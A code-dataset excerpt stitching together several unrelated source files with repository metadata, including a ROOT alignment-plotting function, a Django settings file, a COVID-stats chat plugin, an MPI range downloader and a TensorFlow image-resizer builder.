    hy = ROOT.TH2F("%s_y" % name, "", bins, -wnd[1], wnd[1], bins, -wnd[1], wnd[1])
    hz = ROOT.TH2F("%s_z" % name, "", bins, -wnd[2], wnd[2], bins, -wnd[2], wnd[2])
    hphix = ROOT.TH2F("%s_phix" % name, "", bins, -wnd[3], wnd[3], bins, -wnd[3], wnd[3])
    hphiy = ROOT.TH2F("%s_phiy" % name, "", bins, -wnd[4], wnd[4], bins, -wnd[4], wnd[4])
    hphiz = ROOT.TH2F("%s_phiz" % name, "", bins, -wnd[5], wnd[5], bins, -wnd[5], wnd[5])
    hhh = [hx, hy, hz, hphix, hphiy, hphiz]
    # initialize PCA objects
    global pca_x, pca_y, pca_z, pca_phix, pca_phiy, pca_phiz
    pca_x = ROOT.TPrincipal(2,"D")
    pca_y = ROOT.TPrincipal(2,"D")
    pca_z = ROOT.TPrincipal(2,"D")
    pca_phix = ROOT.TPrincipal(2,"D")
    pca_phiy = ROOT.TPrincipal(2,"D")
    pca_phiz = ROOT.TPrincipal(2,"D")
    pcas = [pca_x, pca_y, pca_z, pca_phix, pca_phiy, pca_phiz]
    # arrays to later fill graphs with
    ax=[]; ay=[]; az=[]; aphix=[]; aphiy=[]; aphiz=[]
    aaa = [ax, ay, az, aphix, aphiy, aphiz]
    # list of postal addresses
    postal_addresses = []
    # if reports are given, use them to fill addresses and do extra checks
    if check_reports:
        for r1 in reportsX:
            # skip ME1/a
            if r1.postal_address[0]=='CSC' and r1.postal_address[2]==1 and r1.postal_address[3]==4: continue
            if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
                r2 = getReportByPostalAddress(r1.postal_address, reportsY)
                if r2 is None:
                    print "bad r2 in ",r1.postal_address
                    continue
                if r1.status != "PASS" or r2.status != "PASS":
                    print "bad status", r1.postal_address, r1.status, r2.status
                    continue
                postal_addresses.append(r1.postal_address)
    # otherwise, use chamber addresses from xmls
    else:
        for key in geometry0.dt.keys():
            if len(key)==3 and key in geometryX.dt and key in geometryY.dt:
                postal_addresses.append( tuple(['DT'] + list(key)) )
        for key in geometry0.csc.keys():
            # skip ME1/a
            if key[2]==1 and key[3]==4: continue
            if len(key)==4 and key in geometryX.csc and key in geometryY.csc:
                postal_addresses.append( tuple(['CSC'] + list(key)) )
    # fill the values
    for addr in postal_addresses:
        # checks the selection function
        if not (selection is None or (selection.__code__.co_argcount == len(addr) and selection(*addr)) ): continue
        # factor 10 scales translations (presumably cm -> mm, with per-chamber
        # signs from signConventions -- TODO confirm); 1000 scales rad -> mrad
        factors = [10. * signConventions[addr][0], 10. * signConventions[addr][1], 10. * signConventions[addr][2],
                   1000., 1000., 1000. ]
        if check_reports:
            rX = getReportByPostalAddress(addr, reportsX)
            rY = getReportByPostalAddress(addr, reportsY)
            deltasX = [rX.deltax, rX.deltay, rX.deltaz, rX.deltaphix, rX.deltaphiy, rX.deltaphiz]
            deltasY = [rY.deltax, rY.deltay, rY.deltaz, rY.deltaphix, rY.deltaphiy, rY.deltaphiz]
        if mode == "reports":
            # keep only coordinates with valid values and non-zero combined errors
            checks = map( lambda d1, d2: d1 is not None and d2 is not None and d1.error is not None \
                          and d2.error is not None and (d1.error**2 + d2.error**2) > 0. , \
                          deltasX, deltasY)
            for i in range(len(checks)):
                if not checks[i]: continue
                fillX = deltasX[i].value * factors[i]
                fillY = deltasY[i].value * factors[i]
                aaa[i].append([fillX,fillY])
                pcas[i].AddRow(array.array('d',[fillX,fillY]))
                # grow the adaptive plotting window to cover this point
                mx = max(abs(fillX), abs(fillY))
                if mx > wnd_adaptive[i]: wnd_adaptive[i] = mx
        if mode == "xmls":
            db0 = dbX = dbY = None
            if addr[0] == "DT":
                db0, dbX, dbY = geometry0.dt[addr[1:]], geometryX.dt[addr[1:]], geometryY.dt[addr[1:]]
            if addr[0] == 'CSC':
                db0, dbX, dbY = geometry0.csc[addr[1:]], geometryX.csc[addr[1:]], geometryY.csc[addr[1:]]
            checks = [True]*6
            if check_reports:
                checks = map( lambda d1, d2: d1 is not None and d2 is not None , deltasX, deltasY)
            gdeltas0 = [db0.x, db0.y, db0.z, db0.phix, db0.phiy, db0.phiz]
            gdeltasX = [dbX.x, dbX.y, dbX.z, dbX.phix, dbX.phiy, dbX.phiz]
            gdeltasY = [dbY.x, dbY.y, dbY.z, dbY.phix, dbY.phiy, dbY.phiz]
            for i in range(len(checks)):
                if not checks[i]: continue
                # corrections are differences with respect to the common geometry0
                fillX = (gdeltasX[i] - gdeltas0[i]) * factors[i]
                fillY = (gdeltasY[i] - gdeltas0[i]) * factors[i]
                aaa[i].append([fillX,fillY])
                pcas[i].AddRow(array.array('d',[fillX,fillY]))
                mx = max(abs(fillX), abs(fillY))
                if mx > wnd_adaptive[i]: wnd_adaptive[i] = mx
                #if addr[0] == 'CSC' and i==1 and (abs(fillX)>0.01 or abs(fillY)>0.01): print addr, ": hugeCSC i=%d dx=%.03g dy=%.03g"%(i,fillX,fillY)
                #if addr[0] == 'CSC' and i==2 and (abs(fillX)>0.02 or abs(fillY)>0.02): print addr, ": hugeCSC i=%d dx=%.03g dy=%.03g"%(i,fillX,fillY)
                #if addr[0] == 'CSC' and i==3 and (abs(fillX)>0.05 or abs(fillY)>0.05): print addr, ": hugeCSC i=%d dx=%.03g dy=%.03g"%(i,fillX,fillY)
    # axis titles depend on which kind of inputs were compared
    if mode == "xmls":
        if pre_title_x is None: pre_title_x = "geometry 1 "
        if pre_title_y is None: pre_title_y = "geometry 2 "
    if mode == "reports":
        if pre_title_x is None: pre_title_x = "iteration's "
        if pre_title_y is None: pre_title_y = "other iteration's "
    tmptitles = ["#Deltax (mm)", "#Deltay (mm)", "#Deltaz (mm)",
                 "#Delta#phi_{x} (mrad)", "#Delta#phi_{y} (mrad)", "#Delta#phi_{z} (mrad)"]
    htitles = []
    for t in tmptitles: htitles.append([pre_title_x + t, pre_title_y + t])
    if canvas is not None: c = canvas
    else: c = c1
    c.Clear()
    # split the canvas according to how many coordinates were requested
    ndraw = which.count('1')
    if ndraw > 4: c.Divide(3, 2)
    elif ndraw > 2: c.Divide(2, 2)
    elif ndraw > 1: c.Divide(2, 1)
    global lines, graphs, texs
    lines = []; graphs = []; texs = []
    ipad = 0
    for i in range(6):
        # decode 'which' binary mask
        if ( int(which,2) & (1<<i) ) == 0: continue
        ipad += 1
        c.GetPad(ipad).cd()
        c.GetPad(ipad).SetGridx(1)
        c.GetPad(ipad).SetGridy(1)
        wn = 1.08 * wnd_adaptive[i]
        hhh[i].GetXaxis().SetRangeUser(-wn, wn)
        hhh[i].GetYaxis().SetRangeUser(-wn, wn)
        hhh[i].SetXTitle(htitles[i][0])
        hhh[i].SetYTitle(htitles[i][1])
        hhh[i].GetXaxis().CenterTitle()
        hhh[i].GetYaxis().CenterTitle()
        hhh[i].Draw()
        if len(aaa[i]) == 0: continue
        a1, a2 = map( lambda x: array.array('d',x), list(zip(*aaa[i])) )
        g = ROOT.TGraph(len(a1), a1, a2)
        g.SetMarkerStyle(5)
        g.SetMarkerSize(0.3)
        g.SetMarkerColor(ROOT.kBlue)
        graphs.append(g)
        # PCA line: slope from the first eigenvector, intercept from the means
        pcas[i].MakePrincipals()
        #pcas[i].Print()
        #pcas[i].MakeHistograms()
        b = pcas[i].GetEigenVectors()(1,0) / pcas[i].GetEigenVectors()(0,0)
        a = pcas[i].GetMeanValues()[1] - b * pcas[i].GetMeanValues()[0]
        #print a, b, " ", pcas[i].GetEigenValues()[0], pcas[i].GetEigenValues()[1]
        # linear correlation coefficient from the covariance matrix
        cov = pcas[i].GetCovarianceMatrix()
        r = cov(0,1)/sqrt(cov(1,1)*cov(0,0))
        print "r, RMSx, RMSy =", r, g.GetRMS(1), g.GetRMS(2)
        texrms = ROOT.TLatex(0.17,0.87, "RMS x,y = %.02g, %.02g" % (g.GetRMS(1),g.GetRMS(2)))
        texr = ROOT.TLatex(0.17,0.80, "r = %.02g" % r)
        for t in texr, texrms:
            t.SetNDC(1)
            t.SetTextColor(ROOT.kBlue)
            t.SetTextSize(0.053)
            t.Draw()
            texs.append(t)
        g.Draw("p")
        # draw the PCA axis unless the slope is undefined (vertical scatter)
        if not isnan(b):
            wn = wnd_adaptive[i]
            line = ROOT.TLine(-wn, a - b*wn, wn, a + b*wn)
            line.SetLineColor(ROOT.kRed)
            line.Draw()
            lines.append(line)
    #return hx, hy, hphiy, hphiz, pca_x, pca_y, pca_phiy, pca_phiz
    return aaa
| 43.389272
| 186
| 0.597403
|
794af3a243e810510df3eb27651da685b22f971a
| 2,739
|
py
|
Python
|
example/project/settings.py
|
unityoxb/django-tailwind
|
770f537fc5f5ed56186d3e1dd40a8003adc1b543
|
[
"MIT"
] | null | null | null |
example/project/settings.py
|
unityoxb/django-tailwind
|
770f537fc5f5ed56186d3e1dd40a8003adc1b543
|
[
"MIT"
] | null | null | null |
example/project/settings.py
|
unityoxb/django-tailwind
|
770f537fc5f5ed56186d3e1dd40a8003adc1b543
|
[
"MIT"
] | 1
|
2021-05-18T11:39:51.000Z
|
2021-05-18T11:39:51.000Z
|
"""
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import socket
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "7c@h1io9=5@8m%fqlyvnx&!x0zm556-g@+dpvu4ab+tsjkm@vm"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
INTERNAL_IPS = [
"127.0.0.1",
]
# Gets internal IP address for a Docker container
ip = socket.gethostbyname(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + "1"]
# Application definition
INSTALLED_APPS = ["django.contrib.staticfiles", "tailwind", "theme"]
TAILWIND_APP_NAME = "theme"
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "project.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
],
},
},
]
WSGI_APPLICATION = "project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = BASE_DIR / "staticfiles"
| 25.361111
| 91
| 0.705732
|
794af414e8614b53793bd3625ec3cdbe17d77dea
| 446
|
py
|
Python
|
controller/config.py
|
RegadorAutomaticoConsciente/RACAP
|
2d097eb4671eeef311169ce3cb1ab77226f37b4d
|
[
"Apache-2.0"
] | null | null | null |
controller/config.py
|
RegadorAutomaticoConsciente/RACAP
|
2d097eb4671eeef311169ce3cb1ab77226f37b4d
|
[
"Apache-2.0"
] | 4
|
2019-11-05T19:36:30.000Z
|
2019-11-19T19:48:08.000Z
|
controller/config.py
|
RegadorAutomaticoConsciente/RACAP
|
2d097eb4671eeef311169ce3cb1ab77226f37b4d
|
[
"Apache-2.0"
] | null | null | null |
import os

# Base REST endpoint for this Raspberry's Arduino resources.
API_ENDPOINT = "https://racweb.herokuapp.com/raspberry/1/arduino"
# Device collection endpoint (base endpoint plus trailing slash).
DEVICES_ENDPOINT = "{}/".format(API_ENDPOINT)
# Slot collection for one device; fill in the device id with .format(device_id).
SLOTS_ENDPOINT = "{}/{{}}/slots/".format(API_ENDPOINT)
# Published Google Sheets CSV -- presumably the plant catalogue; verify.
PLANTS_ENDPOINT = "https://docs.google.com/spreadsheets/d/e/2PACX-1vT-KbxCsv32_6xZfwCi-KQEUeVskm4cAomqczfHPWIYL-3Nj3D9aawaH6yPFohSzvkJaaU9VSjifk1P/pub?gid=590649384&single=true&output=csv"
# Local directory holding the on-device database files.
DB_PATH = "./database/db/"
# Raspberry identifier; can be overridden via the RASPBERRY_ID env var.
RASPBERRY_ID = os.environ.get("RASPBERRY_ID", "1")
| 44.6
| 188
| 0.780269
|
794af416809ea9adb51da62a9dae441380de3f08
| 79
|
py
|
Python
|
D02/list/sort.py
|
shdx8/dtwrhs
|
108decb8056931fc7601ed455a72ef0d65983ab0
|
[
"MIT"
] | null | null | null |
D02/list/sort.py
|
shdx8/dtwrhs
|
108decb8056931fc7601ed455a72ef0d65983ab0
|
[
"MIT"
] | null | null | null |
D02/list/sort.py
|
shdx8/dtwrhs
|
108decb8056931fc7601ed455a72ef0d65983ab0
|
[
"MIT"
] | null | null | null |
"""Sort a small list of integers and print the sorted result."""
list1 = [2, 1, 5, 8, 6, 7, 4]
# Alternative sample data (strings):
# list1 = ['anak', 'cantik', 'baik']
list1 = sorted(list1)  # build a new sorted list instead of sorting in place
print(list1)
| 19.75
| 31
| 0.632911
|
794af44fe42f71d32e49e1e79f2dd0684a694cf7
| 3,636
|
py
|
Python
|
covid.py
|
jizizr/PagerMaid_Plugins
|
4805ecfd5035cb6b423894c140acbefc4d61136c
|
[
"MIT"
] | null | null | null |
covid.py
|
jizizr/PagerMaid_Plugins
|
4805ecfd5035cb6b423894c140acbefc4d61136c
|
[
"MIT"
] | null | null | null |
covid.py
|
jizizr/PagerMaid_Plugins
|
4805ecfd5035cb6b423894c140acbefc4d61136c
|
[
"MIT"
] | null | null | null |
""" https://github.com/Zeta-qixi/nonebot-plugin-covid19-news """
import json
from typing import Dict
from pagermaid.listener import listener
from pagermaid.utils import alias_command, obtain_message, get
POLICY_ID = {}
class Area:
    """One geographic area (province/city/district) from the Tencent feed."""

    def __init__(self, data):
        # Raw per-area record: name plus today's and cumulative counters.
        self.name = data['name']
        self.today = data['today']
        self.total = data['total']
        # The risk grade may be absent for some areas; fall back to a default.
        self.grade = data['total'].get('grade', '风险未确认')
        self.children = data.get('children', None)

    @property
    async def policy(self):
        """Travel-policy text for this area, fetched on demand."""
        return await get_policy(POLICY_ID.get(self.name))

    @property
    def main_info(self):
        """Markdown summary: header plus new and currently-confirmed counts."""
        header = f"**{self.name} 新冠肺炎疫情情况** ({self.grade})"
        new_cases = f"`😔新增确诊:{self.today['confirm']}`"
        active_cases = f"`☢️现存确诊:{self.total['nowConfirm']}`"
        return f"{header}\n\n{new_cases}\n{active_cases}"
class AreaList(Dict):
    """Mapping of area name -> Area; `add` keys an item by its own name."""

    def add(self, data):
        # The object's name attribute doubles as its lookup key.
        self[data.name] = data
class NewsData:
    """Cache of the Tencent COVID feed, rebuilt only when lastUpdateTime changes."""

    def __init__(self):
        self.data = {}  # becomes an AreaList (name -> Area) once populated
        self.time = ''  # lastUpdateTime of the cached snapshot
        # NOTE(review): update_data() is a coroutine; calling it un-awaited here
        # only creates (and discards) a coroutine object, so no data is loaded
        # at construction time.  The actual refresh happens in covid_info,
        # which awaits update_data() explicitly before each lookup.
        self.update_data()

    async def update_data(self):
        """Refresh self.data from the disease_h5 endpoint if the feed changed."""
        url = "https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5"
        res = (await get(url)).json()
        if res['ret'] != 0:
            # Non-zero ret signals an API error; keep the previous snapshot.
            return
        data = json.loads(res['data'])
        if data['lastUpdateTime'] != self.time:
            self.time = data['lastUpdateTime']
            self.data = AreaList()

            def get_Data(data_):
                # Depth-first walk over areaTree: lists of areas, each dict
                # possibly carrying nested 'children' areas.
                if isinstance(data_, list):
                    for i in data_:
                        get_Data(i)
                if isinstance(data_, dict):
                    area_ = data_.get('children')
                    if area_:
                        get_Data(area_)
                    self.data.add(Area(data_))  # noqa

            get_Data(data['areaTree'][0])
        return
async def set_pid():
    """Populate the global POLICY_ID map (city name -> city id) from the API."""
    url_city_list = 'https://r.inews.qq.com/api/trackmap/citylist?'
    res = (await get(url_city_list)).json()
    for province in res['result']:
        # Provinces without a city list contribute nothing.
        for city in province.get('list') or []:
            POLICY_ID[city['name']] = city['id']
async def get_policy(uid):
    """Return the travel-policy text for city id `uid`, or an error message."""
    url_get_policy = f"https://r.inews.qq.com/api/trackmap/citypolicy?&city_id={uid}"
    payload = (await get(url_get_policy)).json()
    if payload['message'] != 'success':
        return "数据获取失败!"
    try:
        data = payload['result']['data'][0]
    except IndexError:
        # Successful response but no policy entries for this city.
        return "暂无政策信息"
    # Leave/entry policy with their effective dates, separated by a rule.
    return (
        f"出行({data['leave_policy_date']})\n{data['leave_policy']}\n"
        "------\n"
        f"进入({data['back_policy_date']})\n{data['back_policy']}"
    )
# Module-level cache instance shared by all invocations of the covid command.
NewsBot = NewsData()
@listener(is_plugin=True, outgoing=True, command=alias_command("covid"),
          description="获取新冠疫情信息。",
          parameters="<地区>")
async def covid_info(context):
    """Reply with COVID stats for a Chinese city; append travel policy on demand."""
    global POLICY_ID, NewsBot
    await context.edit("正在获取中。。。")
    # Lazily fill the city-id map, then refresh the cached feed.
    if not POLICY_ID:
        await set_pid()
    await NewsBot.update_data()
    try:
        query = await obtain_message(context)
    except ValueError:
        return await context.edit("[covid] 无法获取城市名!")
    # A "政策" marker in the query asks for the travel policy as well.
    wants_policy = "政策" in query
    if wants_policy:
        query = query.replace("政策", "")
    area = NewsBot.data.get(query)
    if area is None:
        await context.edit("[covid] 只限查询国内城市或你地理没学好。")
        return
    if wants_policy:
        policy = await area.policy
    else:
        policy = "Tips: 查询出行政策可加上 `政策`"
    await context.edit(f"{area.main_info}\n\n{policy}")
| 85
| 0.561606
|
794af5133b3b32f453701b69f894e34471ee6a15
| 3,039
|
py
|
Python
|
mpi/main.py
|
whitmans-max/python-examples
|
881a8f23f0eebc76816a0078e19951893f0daaaa
|
[
"MIT"
] | 140
|
2017-02-21T22:49:04.000Z
|
2022-03-22T17:51:58.000Z
|
mpi/main.py
|
whitmans-max/python-examples
|
881a8f23f0eebc76816a0078e19951893f0daaaa
|
[
"MIT"
] | 5
|
2017-12-02T19:55:00.000Z
|
2021-09-22T23:18:39.000Z
|
mpi/main.py
|
whitmans-max/python-examples
|
881a8f23f0eebc76816a0078e19951893f0daaaa
|
[
"MIT"
] | 79
|
2017-01-25T10:53:33.000Z
|
2022-03-11T16:13:57.000Z
|
#!/usr/bin/env python2
#
# https://pythonhosted.org/mpi4py/usrman/tutorial.html
#
# mpiexec -n 5 python test-mpi.py
#
import requests
from mpi4py import MPI
# --- functions ---
def build_ranges(value, numsplits, rank):
    """Split `value` bytes into `numsplits` contiguous (start, end) byte ranges.

    `rank` is used only for the log line.  The first range starts at 0; each
    later range starts one byte past the previous (rounded) boundary, and the
    endpoints are inclusive -- matching HTTP Range request semantics.
    """
    print '[RANK: %d ] build_ranges: %s/%s' % (rank, value, numsplits)
    ranges = []
    for i in range(numsplits):
        if i == 0:
            start = i
        else:
            # 1 + i*chunk places the start one byte past the previous end
            start = int(round(1 + i * value/(numsplits*1.0), 0))
        end = int(round(1 + i * value/(numsplits*1.0) + value/(numsplits*1.0)-1, 0))
        ranges.append((start, end))
    return ranges
def get_file_data(url, data_range, rank):
    """Download one inclusive byte range of `url` via an HTTP Range request.

    data_range is a (start, end) tuple; rank is used only for logging.
    Returns the raw bytes of the response body.
    """
    print '[RANK: %d ] get_file_data: %s' % (rank, data_range)
    response = requests.get(url, headers={'Range': 'bytes=%s-%s' % data_range})
    data = response.content
    return data
def merge(filename, data, data_range, rank):
    """Write this rank's `data` into `filename` at its byte offset via MPI-IO.

    Write_at_all is a collective call, so every rank must reach this function;
    each writes its own disjoint region of the shared output file.
    `comm` and `amode` are module-level globals set in the main section.
    """
    offset, end = data_range
    print '[RANK: %d ] merge: %s-%s' % (rank, offset, end)
    fh = MPI.File.Open(comm, filename, amode)
    fh.Write_at_all(offset, data)
    fh.Close()
# --- main ---
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
numr = comm.Get_size()
# Output file is created and written collectively by all ranks.
amode = MPI.MODE_WRONLY|MPI.MODE_CREATE
print '[RANK: %d ] starting: %d/%d' % (rank, rank, numr)
# ---------------------------------------------------------------------
# --- doesn't work ---
#url = 'http://2u.fileshare.ro/download/3172391991/JerryCo+Feat.+Sanziana+Niculae+-+Esti+Tot+Ce+Am+%28+Original+Radio+Edit+%29+%5B+AlegeMuzica.Info+%5D.mp3'
# --- works ---
url = 'http://greenteapress.com/thinkpython/thinkpython.pdf'
#url = 'http://www25.zippyshare.com/d/RTtv9Zv1/30183/Andra%20feat.%20David%20Bisbal%20-%20Without%20You%20%40%20PeMuzica.Com.mp3'
#url = 'http://broadcast.lds.org/churchmusic/MP3/1/2/nowords/271.mp3'
filename = url.split('/')[-1]
# - different proceses -
if rank == 0:
    if not url:
        print "Please Enter some url to begin download."
    # - get file size -
    # identity encoding so content-length reflects the actual byte count
    response = requests.head(url, headers={'Accept-Encoding': 'identity'})
    size_in_bytes = response.headers.get('content-length', None)
    print '[RANK: %d ] %s bytes to download.' % (rank, size_in_bytes)
    if not size_in_bytes:
        print "Size cannot be determined."
        exit()
    # - generate ranges -
    byte_ranges = build_ranges(int(size_in_bytes), numr, rank)
    print '[RANK: %d ] byte_ranges: %s' % (rank, byte_ranges)
    # - send ranges -
    # rank 0 sends range i to worker rank i (tag == destination rank)
    for itm in range(1, len(byte_ranges)):
        req = comm.isend(byte_ranges[itm], dest=itm, tag=itm)
        req.wait()
    # - "receive" range -
    data_range = byte_ranges[0]
else:
    # - receive range -
    req = comm.irecv(source=0, tag=rank)
    data_range = req.wait()
# - all processes -
print '[RANK: %d ] data_range: %s' % (rank, data_range)
# - download -
data = get_file_data(url, data_range, rank)
# - merge -
# collective: every rank must call merge (see Write_at_all)
merge(filename, data, data_range, rank)
# - end -
print '[RANK: %d ] ending: %d/%d' % (rank, rank, numr)
| 23.742188
| 156
| 0.59921
|
794af688c647cb59d5333110d5d2f8b0eb9b6295
| 7,715
|
py
|
Python
|
research/object_detection/builders/image_resizer_builder.py
|
pdharma01/models
|
063091d2a9fb2071f15b0921bed888d86833c4f1
|
[
"Apache-2.0"
] | 153
|
2020-10-25T13:58:04.000Z
|
2022-03-07T06:01:54.000Z
|
object_detection_api/builders/image_resizer_builder.py
|
HuaxingXu/marine_debris_ML
|
9b7317c0ad881849ce5688aeb1eb368dfb85d39f
|
[
"Apache-2.0"
] | 11
|
2020-07-13T08:29:00.000Z
|
2022-03-24T07:21:09.000Z
|
object_detection_api/builders/image_resizer_builder.py
|
HuaxingXu/marine_debris_ML
|
9b7317c0ad881849ce5688aeb1eb368dfb85d39f
|
[
"Apache-2.0"
] | 23
|
2020-10-25T14:44:47.000Z
|
2021-03-31T02:12:13.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builder function for image resizing operations."""
import functools
import tensorflow as tf
from object_detection.core import preprocessor
from object_detection.protos import image_resizer_pb2
def _tf_resize_method(resize_method):
  """Maps image resize method from enumeration type to TensorFlow.

  Args:
    resize_method: The resize_method attribute of keep_aspect_ratio_resizer or
      fixed_shape_resizer.

  Returns:
    method: The corresponding TensorFlow ResizeMethod.

  Raises:
    ValueError: if `resize_method` is of unknown type.
  """
  # Translation table from the proto enum to TensorFlow's resize methods.
  proto_to_tf_method = {
      image_resizer_pb2.BILINEAR: tf.image.ResizeMethod.BILINEAR,
      image_resizer_pb2.NEAREST_NEIGHBOR: tf.image.ResizeMethod.NEAREST_NEIGHBOR,
      image_resizer_pb2.BICUBIC: tf.image.ResizeMethod.BICUBIC,
      image_resizer_pb2.AREA: tf.image.ResizeMethod.AREA,
  }
  if resize_method not in proto_to_tf_method:
    raise ValueError('Unknown resize_method')
  return proto_to_tf_method[resize_method]
def build(image_resizer_config):
  """Builds callable for image resizing operations.

  Args:
    image_resizer_config: image_resizer.proto object containing parameters for
      an image resizing operation.

  Returns:
    image_resizer_fn: Callable for image resizing. This callable always takes
      a rank-3 image tensor (corresponding to a single image) and returns a
      rank-3 image tensor, possibly with new spatial dimensions.

  Raises:
    ValueError: if `image_resizer_config` is of incorrect type.
    ValueError: if `image_resizer_config.image_resizer_oneof` is of expected
      type.
    ValueError: if min_dimension > max_dimension when keep_aspect_ratio_resizer
      is used.
  """
  if not isinstance(image_resizer_config, image_resizer_pb2.ImageResizer):
    raise ValueError('image_resizer_config not of type '
                     'image_resizer_pb2.ImageResizer.')

  # Each branch below builds image_resizer_fn and returns it directly unless
  # convert_to_grayscale is set, in which case control falls through to the
  # grayscale_image_resizer wrapper defined at the end of this function.
  image_resizer_oneof = image_resizer_config.WhichOneof('image_resizer_oneof')
  if image_resizer_oneof == 'keep_aspect_ratio_resizer':
    keep_aspect_ratio_config = image_resizer_config.keep_aspect_ratio_resizer
    if not (keep_aspect_ratio_config.min_dimension <=
            keep_aspect_ratio_config.max_dimension):
      raise ValueError('min_dimension > max_dimension')
    method = _tf_resize_method(keep_aspect_ratio_config.resize_method)
    per_channel_pad_value = (0, 0, 0)
    if keep_aspect_ratio_config.per_channel_pad_value:
      per_channel_pad_value = tuple(keep_aspect_ratio_config.
                                    per_channel_pad_value)
    image_resizer_fn = functools.partial(
        preprocessor.resize_to_range,
        min_dimension=keep_aspect_ratio_config.min_dimension,
        max_dimension=keep_aspect_ratio_config.max_dimension,
        method=method,
        pad_to_max_dimension=keep_aspect_ratio_config.pad_to_max_dimension,
        per_channel_pad_value=per_channel_pad_value)
    if not keep_aspect_ratio_config.convert_to_grayscale:
      return image_resizer_fn
  elif image_resizer_oneof == 'fixed_shape_resizer':
    fixed_shape_resizer_config = image_resizer_config.fixed_shape_resizer
    method = _tf_resize_method(fixed_shape_resizer_config.resize_method)
    image_resizer_fn = functools.partial(
        preprocessor.resize_image,
        new_height=fixed_shape_resizer_config.height,
        new_width=fixed_shape_resizer_config.width,
        method=method)
    if not fixed_shape_resizer_config.convert_to_grayscale:
      return image_resizer_fn
  elif image_resizer_oneof == 'identity_resizer':
    # Pass-through resizer: returns the image (and masks) unchanged along
    # with its shape, mirroring the output structure of the real resizers.
    def image_resizer_fn(image, masks=None, **kwargs):
      del kwargs
      if masks is None:
        return [image, tf.shape(image)]
      else:
        return [image, masks, tf.shape(image)]
    return image_resizer_fn
  elif image_resizer_oneof == 'conditional_shape_resizer':
    conditional_shape_resize_config = (
        image_resizer_config.conditional_shape_resizer)
    method = _tf_resize_method(conditional_shape_resize_config.resize_method)
    # GREATER: shrink images larger than the threshold;
    # SMALLER: grow images smaller than the threshold.
    if conditional_shape_resize_config.condition == (
        image_resizer_pb2.ConditionalShapeResizer.GREATER):
      image_resizer_fn = functools.partial(
          preprocessor.resize_to_max_dimension,
          max_dimension=conditional_shape_resize_config.size_threshold,
          method=method)
    elif conditional_shape_resize_config.condition == (
        image_resizer_pb2.ConditionalShapeResizer.SMALLER):
      image_resizer_fn = functools.partial(
          preprocessor.resize_to_min_dimension,
          min_dimension=conditional_shape_resize_config.size_threshold,
          method=method)
    else:
      raise ValueError(
          'Invalid image resizer condition option for '
          'ConditionalShapeResizer: \'%s\'.'
          % conditional_shape_resize_config.condition)
    if not conditional_shape_resize_config.convert_to_grayscale:
      return image_resizer_fn
  elif image_resizer_oneof == 'pad_to_multiple_resizer':
    pad_to_multiple_resizer_config = (
        image_resizer_config.pad_to_multiple_resizer)
    if pad_to_multiple_resizer_config.multiple < 0:
      raise ValueError('`multiple` for pad_to_multiple_resizer should be > 0.')
    else:
      image_resizer_fn = functools.partial(
          preprocessor.resize_pad_to_multiple,
          multiple=pad_to_multiple_resizer_config.multiple)
    if not pad_to_multiple_resizer_config.convert_to_grayscale:
      return image_resizer_fn
  else:
    raise ValueError(
        'Invalid image resizer option: \'%s\'.' % image_resizer_oneof)

  def grayscale_image_resizer(image, masks=None):
    """Convert to grayscale before applying image_resizer_fn.

    Args:
      image: A 3D tensor of shape [height, width, 3]
      masks: (optional) rank 3 float32 tensor with shape [num_instances, height,
        width] containing instance masks.

    Returns:
      Note that the position of the resized_image_shape changes based on whether
      masks are present.
      resized_image: A 3D tensor of shape [new_height, new_width, 1],
        where the image has been resized (with bilinear interpolation) so that
        min(new_height, new_width) == min_dimension or
        max(new_height, new_width) == max_dimension.
      resized_masks: If masks is not None, also outputs masks. A 3D tensor of
        shape [num_instances, new_height, new_width].
      resized_image_shape: A 1D tensor of shape [3] containing shape of the
        resized image.
    """
    # image_resizer_fn returns [resized_image, resized_image_shape] if
    # mask==None, otherwise it returns
    # [resized_image, resized_mask, resized_image_shape]. In either case, we
    # only deal with first and last element of the returned list.
    retval = image_resizer_fn(image, masks)
